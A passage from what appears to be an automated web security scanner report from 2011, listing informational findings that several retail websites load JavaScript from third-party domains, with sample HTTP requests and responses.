X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: TLTSID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: JSESSIONID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Path=/
Set-Cookie: _714bc2c9=guest; Expires=Tue, 15-May-2012 02:01:31 GMT; Path=/
Set-Cookie: CS_TRACKER_ID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Expires=Sat, 03-Jun-2079 05:15:38 GMT
RTSS: 1
Set-Cookie: TS18d374=e7c2bf9d5c17e0294f3546cf4c9ad3fb60874fe9f20602d14dd0857b; Path=/
Content-Length: 43592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="ht
...[SNIP]...

<script src="http://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.21. http://www.bluenile.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://connect.facebook.net/en_US/all.js

Request

Response

18.22. http://www.bluenile.com/build-your-own-diamond-ring previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/build-your-own-diamond-ring

Issue detail

The response dynamically includes the following script from another domain:

http://connect.facebook.net/en_US/all.js

Request

Response

18.23. http://www.bluenile.com/engagement-rings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/engagement-rings

Issue detail

The response dynamically includes the following script from another domain:

http://connect.facebook.net/en_US/all.js

Request

Response

18.24. http://www.brookstone.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brookstone.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://cts-secure.channelintelligence.com/1272812728_landing.js

Request

Response

18.25. http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brookstone.com
Path:	/floating-daybed-with-canopy-pool-lounger.html

Issue detail

The response dynamically includes the following script from another domain:

https://cts-secure.channelintelligence.com/1272812728_landing.js

Request

Response

18.26. http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brookstone.com
Path:	/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html

Issue detail

The response dynamically includes the following script from another domain:

https://cts-secure.channelintelligence.com/1272812728_landing.js

Request

Response

18.27. http://www.brookstone.com/outdoor-living.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brookstone.com
Path:	/outdoor-living.html

Issue detail

The response dynamically includes the following script from another domain:

https://cts-secure.channelintelligence.com/1272812728_landing.js

Request

Response

18.28. http://www.brookstone.com/shoppingCart.jsp.vr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brookstone.com
Path:	/shoppingCart.jsp.vr

Issue detail

The response dynamically includes the following script from another domain:

https://cts-secure.channelintelligence.com/1272812728_cart.js

Request

Response

18.29. https://www.brookstone.com/formhandlerservlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.brookstone.com
Path:	/formhandlerservlet

Issue detail

The response dynamically includes the following scripts from other domains:

https://cts-secure.channelintelligence.com/1272812728_landing.js
https://seal.verisign.com/getseal?host_name=www.brookstone.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

Response

18.30. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

Response

18.31. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

Response

18.32. http://www.footlocker.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://libs.coremetrics.com/eluminate.js
http://t.p.mybuys.com/clients/FOOTLOCKER/js/setup.js
http://t.p.mybuys.com/js/mybuys3.js
https://seal.verisign.com/getseal?host_name=www.footlocker.com&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:56 GMT
Connection: close
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei;expires=Wed, 08-May-2041 01:58:56 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 01:58:56 GMT;path=/
Content-Length: 107727


<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>


<title>Sneakers - Athletic Sho
...[SNIP]...
</script>

<script language="javascript1.1" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"></script>
...[SNIP]...


   <script type="text/javascript" src="http://t.p.mybuys.com/js/mybuys3.js"></script>
   <script type="text/javascript" src="http://t.p.mybuys.com/clients/FOOTLOCKER/js/setup.js"></script>
...[SNIP]...
<div class="footer-icons-slot margin-mod"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.footlocker.com&size=S&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...

18.33. https://www.footlocker.com/account/default.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.footlocker.com
Path:	/account/default.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

https://libs.coremetrics.com/eluminate.js
https://seal.verisign.com/getseal?host_name=www.footlocker.com&size=S&use_flash=YES&use_transparent=YES&lang=en
https://t.p.mybuys.com/clients/FOOTLOCKER/js/setup.js
https://t.p.mybuys.com/js/mybuys3.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 159425


<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>


<title>Foot Locker New Account
...[SNIP]...


   <script type="text/javascript" src="https://t.p.mybuys.com/js/mybuys3.js"></script>
   <script type="text/javascript" src="https://t.p.mybuys.com/clients/FOOTLOCKER/js/setup.js"></script>
...[SNIP]...
</div>

<script language="javascript1.1" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"></script>
...[SNIP]...
<div class="footer-icons-slot margin-mod"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.footlocker.com&size=S&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...

18.34. https://www.footlocker.com/account/default/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.footlocker.com
Path:	/account/default/

Issue detail

The response dynamically includes the following scripts from other domains:

https://libs.coremetrics.com/eluminate.js
https://seal.verisign.com/getseal?host_name=www.footlocker.com&size=S&use_flash=YES&use_transparent=YES&lang=en
https://t.p.mybuys.com/clients/FOOTLOCKER/js/setup.js
https://t.p.mybuys.com/js/mybuys3.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:41 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D14;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:41 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:41 GMT;path=/
Content-Length: 78368


<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>


<title>Foot Locker Account Sig
...[SNIP]...


   <script type="text/javascript" src="https://t.p.mybuys.com/js/mybuys3.js"></script>
   <script type="text/javascript" src="https://t.p.mybuys.com/clients/FOOTLOCKER/js/setup.js"></script>
...[SNIP]...
</div>

<script language="javascript1.1" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"></script>
...[SNIP]...
<div class="footer-icons-slot margin-mod"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.footlocker.com&size=S&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...

18.35. http://www.ftd.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.ftdimg.com/js/omniture.js
http://www.ftdimg.com/js/tealeaf.js
http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js
http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys-setup.js
http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys3.js
http://www.ftdimg.com/v20110407/js/compressed-jcarousel.js
http://www.ftdimg.com/v20110407/js/compressed.js
https://ftd.netmng.com/?aid=181

Request

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:22 GMT
X-Varnish: 767403341 767403290
Age: 1
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>

   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
    <script type="text/javascript" src="http://www.ftdimg.com/v20110407/js/compressed-jcarousel.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://www.ftdimg.com/js/tealeaf.js"></script>
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys3.js"></script>
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys-setup.js"></script>
...[SNIP]...

<script src="https://ftd.netmng.com/?aid=181" type="text/javascript" defer="defer"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.ftdimg.com/js/omniture.js"></script>
...[SNIP]...

18.36. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/sweet-shop-ctg/product-sweet-shop/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.ftdimg.com/js/omniture.js
http://www.ftdimg.com/js/tealeaf.js
http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js
http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys-setup.js
http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys3.js
http://www.ftdimg.com/v20110407/js/compressed.js
https://ftd.netmng.com/?aid=181

Request

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>

<script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.ftdimg.com/js/tealeaf.js"></script>
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys3.js"></script>
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys-setup.js"></script>
...[SNIP]...

<script src="https://ftd.netmng.com/?aid=181" type="text/javascript" defer="defer"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.ftdimg.com/js/omniture.js"></script>
...[SNIP]...

18.37. http://www.gnc.com/community/index.jsp%20%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnc.com
Path:	/community/index.jsp%20%20

Issue detail

The response dynamically includes the following scripts from other domains:

http://eval.bizrate.com/js/survey_126457_1.js
http://gnc.imageg.net/include/shoprunner/js/shoprunner_init.js
http://gnc.imageg.net/js/gomez-gtagb4_noobj.js
http://media.gsimedia.net/tg/gsiutt/store76.js
https://dsa.csdata1.com/data/js/10040766/csgather.js

Request

Response

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 10:16:24 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=f5hHNQ5YYHfFrLKw6fkW4j6LhJpz8ZYLdnCQyDkP3DhhtWxJ2d2l!1363466968; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 81483

                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtm
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://GNC.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://GNC.imageg.net/include/shoprunner/js/shoprunner_init.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/10040766/csgather.js'></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://eval.bizrate.com/js/survey_126457_1.js"></script>
...[SNIP]...


<script src="http://media.gsimedia.net/tg/gsiutt/store76.js"></script>
...[SNIP]...

18.38. http://www.gnc.com/home/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnc.com
Path:	/home/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://eval.bizrate.com/js/survey_126457_1.js
http://gnc.imageg.net/include/shoprunner/js/shoprunner_init.js
http://gnc.imageg.net/js/gomez-gtagb4_noobj.js
http://media.gsimedia.net/tg/gsiutt/store76.js
http://web.aisle7.net/jsapi/1.0/content.js
https://dsa.csdata1.com/data/js/10040766/csgather.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:11 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 114194

                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://GNC.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://GNC.imageg.net/include/shoprunner/js/shoprunner_init.js"></script>
...[SNIP]...
<td height="111"><script type="text/javascript" src="http://web.aisle7.net/jsapi/1.0/content.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/10040766/csgather.js'></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://eval.bizrate.com/js/survey_126457_1.js"></script>
...[SNIP]...


<script src="http://media.gsimedia.net/tg/gsiutt/store76.js"></script>
...[SNIP]...

18.39. https://www.gnc.com/checkout/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.gnc.com
Path:	/checkout/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

https://dsa.csdata1.com/data/js/10040766/csgather.js
https://media.gsimedia.net/tg/gsiutt/store76.js

Request

Response

18.40. http://www.guitarcenter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guitarcenter.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
http://dnn506yrbagrg.cloudfront.net/pages/scripts/0009/8956.js

Request

Response

18.41. https://www.guitarcenter.com/MyAccount/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.guitarcenter.com
Path:	/MyAccount/Login.aspx

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

Response

18.42. http://www.helzberg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.helzberg.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/urchin.js
https://dsa.csdata1.com/data/js/1066060/edata1.js
https://seal.verisign.com/getseal?host_name=www.helzberg.com&size=S&use_flash=NO&use_transparent=NO

Request

GET / HTTP/1.1
Host: www.helzberg.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=67638cb10049a42429ba4a456b90.helzberg-b2c-i4; customer=none; basket=none; __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmb=140079658; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1305510061756_802948","pv":1,"to":3,"c":"http://www.helzberg.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: JSP/2.1
Content-Language: en-US
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Mon, 16 May 2011 01:53:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:53:53 GMT
Connection: close
Set-Cookie: customer=none; Expires=Wed, 29-May-2013 01:53:53 GMT; Path=/
Set-Cookie: basket=none; Expires=Mon, 30-May-2011 01:53:53 GMT; Path=/
Content-Length: 37928


...[SNIP]...



                                        <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>


                                                   <script language='javascript' src='https://dsa.csdata1.com/data/js/1066060/edata1.js'></script>
...[SNIP]...
<td valign="middle">
                       <script src=https://seal.verisign.com/getseal?host_name=www.helzberg.com&size=S&use_flash=NO&use_transparent=NO></script>
...[SNIP]...

18.43. https://www.helzberg.com/account/login.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.helzberg.com
Path:	/account/login.do

Issue detail

The response dynamically includes the following scripts from other domains:

https://dsa.csdata1.com/data/js/1066060/edata1.js
https://seal.verisign.com/getseal?host_name=www.helzberg.com&size=S&use_flash=NO&use_transparent=NO
https://ssl.google-analytics.com/urchin.js

Request

Response

18.44. http://www.homedepot.ca/catalog/concrete/173198 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.ca
Path:	/catalog/concrete/173198

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences_all.js
http://www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1

Request

GET /catalog/concrete/173198 HTTP/1.1
Host: www.homedepot.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=989860238041728; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; jsEnabled=1; ResonanceSegment=1; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d15%2c10051; WC_USERSESSION_-1002=%2d1002%2c%2d15%2cCAD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c10501%7c10501%7cnull%7c%2d2000%5d%2cSPiv6UKbre34gGrW2piYfWv44EQ%3d; s_cc=true; fsr.s={"v":1,"rid":"1305510029454_909320","to":5,"c":"https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm","pv":3,"lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305511204415}; s_v14=English; s_sq=homedepotca%3D%2526pid%253Dcreate%252520an%252520account%2526pidt%253D1%2526oid%253DfeelGoodNav%25253ABuilding%252520Materials%25253AConcrete%2525C2%2525A0(21)%25250A%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-CA
Date: Mon, 16 May 2011 10:39:30 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Expires: Thu, 13 May 2021 10:39:29 GMT
Content-Length: 103806

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...


       <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
</script>


       <script src="//www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1"></script>
...[SNIP]...

18.45. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.ca
Path:	/webapp/wcs/stores/servlet/Home

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences_all.js
http://www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1

Request

Response

18.46. http://www.orientaltrading.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orientaltrading.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: www.orientaltrading.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
